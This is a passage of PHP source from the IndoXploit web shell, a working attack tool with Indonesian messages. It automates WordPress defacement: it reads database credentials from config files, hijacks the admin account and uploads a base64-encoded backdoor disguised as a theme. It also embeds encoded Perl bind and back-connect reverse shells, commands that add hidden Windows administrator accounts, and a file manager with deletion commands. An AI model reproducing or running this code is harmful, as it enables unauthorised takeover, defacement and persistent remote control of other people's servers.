$dbprefix."users"; 1450 | $option = $dbprefix."options"; 1451 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 1452 | $db = mysql_select_db($dbname); 1453 | $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); 1454 | $result = mysql_fetch_array($q); 1455 | $id = $result[ID]; 1456 | $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); 1457 | $result2 = mysql_fetch_array($q2); 1458 | $target = $result2[option_value]; 1459 | if($target == '') { 1460 | echo "[-] error, gabisa ambil nama domain nya
"; 1461 | } else { 1462 | echo "[+] $target
"; 1463 | } 1464 | $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); 1465 | if(!$conn OR !$db OR !$update) { 1466 | echo "[-] MySQL Error: ".mysql_error()."

"; 1467 | mysql_close($conn); 1468 | } else { 1469 | $site = "$target/wp-login.php"; 1470 | $site2 = "$target/wp-admin/theme-install.php?upload"; 1471 | $b1 = anucurl($site2); 1472 | $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); 1473 | $b = lohgin($site, $site2, $user, $pass, $wp_sub); 1474 | $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); 1475 | $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); 1476 | $www = "m.php"; 1477 | $fp5 = fopen($www,"w"); 1478 | fputs($fp5,$upload3); 1479 | $post2 = array( 1480 | "_wpnonce" => "$anu2", 1481 | "_wp_http_referer" => "/wp-admin/theme-install.php?upload", 1482 | "themezip" => "@$www", 1483 | "install-theme-submit" => "Install Now", 1484 | ); 1485 | $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); 1486 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1487 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1488 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1489 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1490 | curl_setopt($ch, CURLOPT_POST, 1); 1491 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); 1492 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1493 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1494 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); 1495 | $data3 = curl_exec($ch); 1496 | curl_close($ch); 1497 | $y = date("Y"); 1498 | $m = date("m"); 1499 | $namafile = "id.php"; 1500 | $fpi = fopen($namafile,"w"); 1501 | fputs($fpi,$script); 1502 | $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); 1503 | curl_setopt($ch6, CURLOPT_POST, true); 1504 | curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); 1505 | curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); 1506 | curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); 1507 | curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); 1508 | curl_setopt($ch6, CURLOPT_COOKIESESSION, true); 1509 | $postResult = curl_exec($ch6); 1510 | curl_close($ch6); 1511 | $as = "$target/k.php"; 1512 | $bs = anucurl($as); 1513 | if(preg_match("#$script#is", $bs)) { 1514 | echo "[+] berhasil mepes...
"; 1515 | echo "[+] $as

"; 1516 | } else { 1517 | echo "[-] gagal mepes...
"; 1518 | echo "[!!] coba aja manual:
"; 1519 | echo "[+] $target/wp-login.php
"; 1520 | echo "[+] username: $user
"; 1521 | echo "[+] password: $pass

"; 1522 | } 1523 | mysql_close($conn); 1524 | } 1525 | } 1526 | } 1527 | } else { 1528 | echo "

WordPress Auto Deface

1529 |
1530 |
1531 |
1532 | 1533 |
1534 |
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config ) 1535 |
"; 1536 | } 1537 | } elseif($_GET['do'] == 'auto_dwp2') { 1538 | if($_POST['auto_deface_wp']) { 1539 | function anucurl($sites) { 1540 | $ch = curl_init($sites); 1541 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1542 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1543 | curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 1544 | curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); 1545 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1546 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1547 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1548 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1549 | curl_setopt($ch, CURLOPT_COOKIESESSION,true); 1550 | $data = curl_exec($ch); 1551 | curl_close($ch); 1552 | return $data; 1553 | } 1554 | function lohgin($cek, $web, $userr, $pass, $wp_submit) { 1555 | $post = array( 1556 | "log" => "$userr", 1557 | "pwd" => "$pass", 1558 | "rememberme" => "forever", 1559 | "wp-submit" => "$wp_submit", 1560 | "redirect_to" => "$web", 1561 | "testcookie" => "1", 1562 | ); 1563 | $ch = curl_init($cek); 1564 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1565 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1566 | curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 1567 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1568 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1569 | curl_setopt($ch, CURLOPT_POST, 1); 1570 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 1571 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1572 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1573 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); 1574 | $data = curl_exec($ch); 1575 | curl_close($ch); 1576 | return $data; 1577 | } 1578 | $link = explode("\r\n", $_POST['link']); 1579 | $script = htmlspecialchars($_POST['script']); 1580 | $user = "indoxploit"; 1581 | $pass = "indoxploit"; 1582 | $passx = md5($pass); 1583 | foreach($link as $dir_config) { 1584 | $config = anucurl($dir_config); 1585 | $dbhost = ambilkata($config,"DB_HOST', '","'"); 1586 | $dbuser = ambilkata($config,"DB_USER', '","'"); 1587 | $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); 1588 | $dbname = ambilkata($config,"DB_NAME', '","'"); 1589 | $dbprefix = ambilkata($config,"table_prefix = '","'"); 1590 | $prefix = $dbprefix."users"; 1591 | $option = $dbprefix."options"; 1592 | $conn = mysql_connect($dbhost,$dbuser,$dbpass); 1593 | $db = mysql_select_db($dbname); 1594 | $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); 1595 | $result = mysql_fetch_array($q); 1596 | $id = $result[ID]; 1597 | $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); 1598 | $result2 = mysql_fetch_array($q2); 1599 | $target = $result2[option_value]; 1600 | if($target == '') { 1601 | echo "[-] error, gabisa ambil nama domain nya
"; 1602 | } else { 1603 | echo "[+] $target
"; 1604 | } 1605 | $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); 1606 | if(!$conn OR !$db OR !$update) { 1607 | echo "[-] MySQL Error: ".mysql_error()."

"; 1608 | mysql_close($conn); 1609 | } else { 1610 | $site = "$target/wp-login.php"; 1611 | $site2 = "$target/wp-admin/theme-install.php?upload"; 1612 | $b1 = anucurl($site2); 1613 | $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); 1614 | $b = lohgin($site, $site2, $user, $pass, $wp_sub); 1615 | $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); 1616 | $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); 1617 | $www = "m.php"; 1618 | $fp5 = fopen($www,"w"); 1619 | fputs($fp5,$upload3); 1620 | $post2 = array( 1621 | "_wpnonce" => "$anu2", 1622 | "_wp_http_referer" => "/wp-admin/theme-install.php?upload", 1623 | "themezip" => "@$www", 1624 | "install-theme-submit" => "Install Now", 1625 | ); 1626 | $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); 1627 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 1628 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 1629 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 1630 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 1631 | curl_setopt($ch, CURLOPT_POST, 1); 1632 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); 1633 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); 1634 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); 1635 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); 1636 | $data3 = curl_exec($ch); 1637 | curl_close($ch); 1638 | $y = date("Y"); 1639 | $m = date("m"); 1640 | $namafile = "id.php"; 1641 | $fpi = fopen($namafile,"w"); 1642 | fputs($fpi,$script); 1643 | $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); 1644 | curl_setopt($ch6, CURLOPT_POST, true); 1645 | curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); 1646 | curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); 1647 | curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); 1648 | curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); 1649 | curl_setopt($ch6, CURLOPT_COOKIESESSION,true); 1650 | $postResult = curl_exec($ch6); 1651 | curl_close($ch6); 1652 | $as = "$target/k.php"; 1653 | $bs = anucurl($as); 1654 | if(preg_match("#$script#is", $bs)) { 1655 | echo "[+] berhasil mepes...
"; 1656 | echo "[+] $as

"; 1657 | } else { 1658 | echo "[-] gagal mepes...
"; 1659 | echo "[!!] coba aja manual:
"; 1660 | echo "[+] $target/wp-login.php
"; 1661 | echo "[+] username: $user
"; 1662 | echo "[+] password: $pass

"; 1663 | } 1664 | mysql_close($conn); 1665 | } 1666 | } 1667 | } else { 1668 | echo "

WordPress Auto Deface V.2

1669 |
1670 | Link Config:
1671 |
1672 |
1673 | 1674 |
"; 1675 | } 1676 | } elseif($_GET['do'] == 'network') { 1677 | echo "
1678 | Bind Port:
1679 | PORT: 1680 | 1681 |
1682 |
1683 | Back Connect:
1684 | Server:    1685 | PORT: 1686 | 1687 |
"; 1688 | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 1689 | if(isset($_POST['sub_bp'])) { 1690 | $f_bp = fopen("/tmp/bp.pl", "w"); 1691 | fwrite($f_bp, base64_decode($bind_port_p)); 1692 | fclose($f_bp); 1693 | 1694 | $port = $_POST['port_bind']; 1695 | $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); 1696 | sleep(1); 1697 | echo "
".$out."\n".exe("ps aux | grep bp.pl")."
"; 1698 | unlink("/tmp/bp.pl"); 1699 | } 1700 | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 1701 | if(isset($_POST['sub_bc'])) { 1702 | $f_bc = fopen("/tmp/bc.pl", "w"); 1703 | fwrite($f_bc, base64_decode($bind_connect_p)); 1704 | fclose($f_bc); 1705 | 1706 | $ipbc = $_POST['ip_bc']; 1707 | $port = $_POST['port_bc']; 1708 | $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); 1709 | sleep(1); 1710 | echo "
".$out."\n".exe("ps aux | grep bc.pl")."
"; 1711 | unlink("/tmp/bc.pl"); 1712 | } 1713 | } elseif($_GET['do'] == 'krdp_shell') { 1714 | if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { 1715 | if($_POST['create']) { 1716 | $user = htmlspecialchars($_POST['user']); 1717 | $pass = htmlspecialchars($_POST['pass']); 1718 | if(preg_match("/$user/", exe("net user"))) { 1719 | echo "[INFO] -> user $user sudah ada"; 1720 | } else { 1721 | $add_user = exe("net user $user $pass /add"); 1722 | $add_groups1 = exe("net localgroup Administrators $user /add"); 1723 | $add_groups2 = exe("net localgroup Administrator $user /add"); 1724 | $add_groups3 = exe("net localgroup Administrateur $user /add"); 1725 | echo "[ RDP ACCOUNT INFO ]
1726 | ------------------------------
1727 | IP: ".$ip."
1728 | Username: $user
1729 | Password: $pass
1730 | ------------------------------

1731 | [ STATUS ]
1732 | ------------------------------
1733 | "; 1734 | if($add_user) { 1735 | echo "[add user] -> Berhasil
"; 1736 | } else { 1737 | echo "[add user] -> Gagal
"; 1738 | } 1739 | if($add_groups1) { 1740 | echo "[add localgroup Administrators] -> Berhasil
"; 1741 | } elseif($add_groups2) { 1742 | echo "[add localgroup Administrator] -> Berhasil
"; 1743 | } elseif($add_groups3) { 1744 | echo "[add localgroup Administrateur] -> Berhasil
"; 1745 | } else { 1746 | echo "[add localgroup] -> Gagal
"; 1747 | } 1748 | echo "------------------------------
"; 1749 | } 1750 | } elseif($_POST['s_opsi']) { 1751 | $user = htmlspecialchars($_POST['r_user']); 1752 | if($_POST['opsi'] == '1') { 1753 | $cek = exe("net user $user"); 1754 | echo "Checking username $user ....... "; 1755 | if(preg_match("/$user/", $cek)) { 1756 | echo "[ Sudah ada ]
1757 | ------------------------------

1758 |
$cek
"; 1759 | } else { 1760 | echo "[ belum ada ]"; 1761 | } 1762 | } elseif($_POST['opsi'] == '2') { 1763 | $cek = exe("net user $user indoxploit"); 1764 | if(preg_match("/$user/", exe("net user"))) { 1765 | echo "[change password: indoxploit] -> "; 1766 | if($cek) { 1767 | echo "Berhasil"; 1768 | } else { 1769 | echo "Gagal"; 1770 | } 1771 | } else { 1772 | echo "[INFO] -> user $user belum ada"; 1773 | } 1774 | } elseif($_POST['opsi'] == '3') { 1775 | $cek = exe("net user $user /DELETE"); 1776 | if(preg_match("/$user/", exe("net user"))) { 1777 | echo "[remove user: $user] -> "; 1778 | if($cek) { 1779 | echo "Berhasil"; 1780 | } else { 1781 | echo "Gagal"; 1782 | } 1783 | } else { 1784 | echo "[INFO] -> user $user belum ada"; 1785 | } 1786 | } else { 1787 | // 1788 | } 1789 | } else { 1790 | echo "-- Create RDP --
1791 |
1792 | 1793 | 1794 | 1795 |
1796 | -- Option --
1797 |
1798 | 1799 | 1804 | 1805 |
1806 | "; 1807 | } 1808 | } else { 1809 | echo "Fitur ini hanya dapat digunakan dalam Windows Server."; 1810 | } 1811 | } elseif($_GET['act'] == 'newfile') { 1812 | if($_POST['new_save_file']) { 1813 | $newfile = htmlspecialchars($_POST['newfile']); 1814 | $fopen = fopen($newfile, "a+"); 1815 | if($fopen) { 1816 | $act = ""; 1817 | } else { 1818 | $act = "permission denied"; 1819 | } 1820 | } 1821 | echo $act; 1822 | echo "
1823 | Filename: 1824 | 1825 |
"; 1826 | } elseif($_GET['act'] == 'newfolder') { 1827 | if($_POST['new_save_folder']) { 1828 | $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); 1829 | if(!mkdir($new_folder)) { 1830 | $act = "permission denied"; 1831 | } else { 1832 | $act = ""; 1833 | } 1834 | } 1835 | echo $act; 1836 | echo "
1837 | Folder Name: 1838 | 1839 |
"; 1840 | } elseif($_GET['act'] == 'rename_dir') { 1841 | if($_POST['dir_rename']) { 1842 | $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); 1843 | if($dir_rename) { 1844 | $act = ""; 1845 | } else { 1846 | $act = "permission denied"; 1847 | } 1848 | echo "".$act."
"; 1849 | } 1850 | echo "
1851 | 1852 | 1853 |
"; 1854 | } elseif($_GET['act'] == 'delete_dir') { 1855 | if(is_dir($dir)) { 1856 | if(is_writable($dir)) { 1857 | @rmdir($dir); 1858 | @exe("rm -rf $dir"); 1859 | @exe("rmdir /s /q $dir"); 1860 | $act = ""; 1861 | } else { 1862 | $act = "could not remove ".basename($dir).""; 1863 | } 1864 | } 1865 | echo $act; 1866 | } elseif($_GET['act'] == 'view') { 1867 | echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; 1868 | echo ""; 1869 | } elseif($_GET['act'] == 'edit') { 1870 | if($_POST['save']) { 1871 | $save = file_put_contents($_GET['file'], $_POST['src']); 1872 | if($save) { 1873 | $act = "Saved!"; 1874 | } else { 1875 | $act = "permission denied"; 1876 | } 1877 | echo "".$act."
"; 1878 | } 1879 | echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; 1880 | echo "
1881 |
1882 | 1883 |
"; 1884 | } elseif($_GET['act'] == 'rename') { 1885 | if($_POST['do_rename']) { 1886 | $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); 1887 | if($rename) { 1888 | $act = ""; 1889 | } else { 1890 | $act = "permission denied"; 1891 | } 1892 | echo "".$act."
"; 1893 | } 1894 | echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; 1895 | echo "
1896 | 1897 | 1898 |
"; 1899 | } elseif($_GET['act'] == 'delete') { 1900 | $delete = unlink($_GET['file']); 1901 | if($delete) { 1902 | $act = ""; 1903 | } else { 1904 | $act = "permission denied"; 1905 | } 1906 | echo $act; 1907 | } else { 1908 | if(is_dir($dir) === true) { 1909 | if(!is_readable($dir)) { 1910 | echo "can't open directory. ( not readable )"; 1911 | } else { 1912 | echo ' 1913 | 1914 | 1915 | 1916 | 1917 | 1918 | 1919 | 1920 | 1921 | '; 1922 | $scandir = scandir($dir); 1923 | foreach($scandir as $dirx) { 1924 | $dtype = filetype("$dir/$dirx"); 1925 | $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); 1926 | if(function_exists('posix_getpwuid')) { 1927 | $downer = @posix_getpwuid(fileowner("$dir/$dirx")); 1928 | $downer = $downer['name']; 1929 | } else { 1930 | //$downer = $uid; 1931 | $downer = fileowner("$dir/$dirx"); 1932 | } 1933 | if(function_exists('posix_getgrgid')) { 1934 | $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); 1935 | $dgrp = $dgrp['name']; 1936 | } else { 1937 | $dgrp = filegroup("$dir/$dirx"); 1938 | } 1939 | if(!is_dir("$dir/$dirx")) continue; 1940 | if($dirx === '..') { 1941 | $href = "$dirx"; 1942 | } elseif($dirx === '.') { 1943 | $href = "$dirx"; 1944 | } else { 1945 | $href = "$dirx"; 1946 | } 1947 | if($dirx === '.' || $dirx === '..') { 1948 | $act_dir = "newfile | newfolder"; 1949 | } else { 1950 | $act_dir = "rename | delete"; 1951 | } 1952 | echo ""; 1953 | echo ""; 1954 | echo ""; 1955 | echo ""; 1956 | echo ""; 1957 | echo ""; 1958 | echo ""; 1959 | echo ""; 1960 | echo ""; 1961 | } 1962 | } 1963 | } else { 1964 | echo "can't open directory."; 1965 | } 1966 | foreach($scandir as $file) { 1967 | $ftype = filetype("$dir/$file"); 1968 | $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); 1969 | $size = filesize("$dir/$file")/1024; 1970 | $size = round($size,3); 1971 | if(function_exists('posix_getpwuid')) { 1972 | $fowner = @posix_getpwuid(fileowner("$dir/$file")); 1973 | $fowner = $fowner['name']; 1974 | } else { 1975 | //$downer = $uid; 1976 | $fowner = fileowner("$dir/$file"); 1977 | } 1978 | if(function_exists('posix_getgrgid')) { 1979 | $fgrp = @posix_getgrgid(filegroup("$dir/$file")); 1980 | $fgrp = $fgrp['name']; 1981 | } else { 1982 | $fgrp = filegroup("$dir/$file"); 1983 | } 1984 | if($size > 1024) { 1985 | $size = round($size/1024,2). 'MB'; 1986 | } else { 1987 | $size = $size. 'KB'; 1988 | } 1989 | if(!is_file("$dir/$file")) continue; 1990 | echo ""; 1991 | echo ""; 1992 | echo ""; 1993 | echo ""; 1994 | echo ""; 1995 | echo ""; 1996 | echo ""; 1997 | echo ""; 1998 | echo ""; 1999 | } 2000 | echo "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
$href
$dtype
-
$dtime
$downer/$dgrp
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
$fowner/$fgrp
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download
"; 2001 | if(!is_readable($dir)) { 2002 | // 2003 | } else { 2004 | echo "
"; 2005 | } 2006 | echo "
Copyright © ".date("Y")." - IndoXploit
"; 2007 | } 2008 | ?> 2009 | 2010 | --------------------------------------------------------------------------------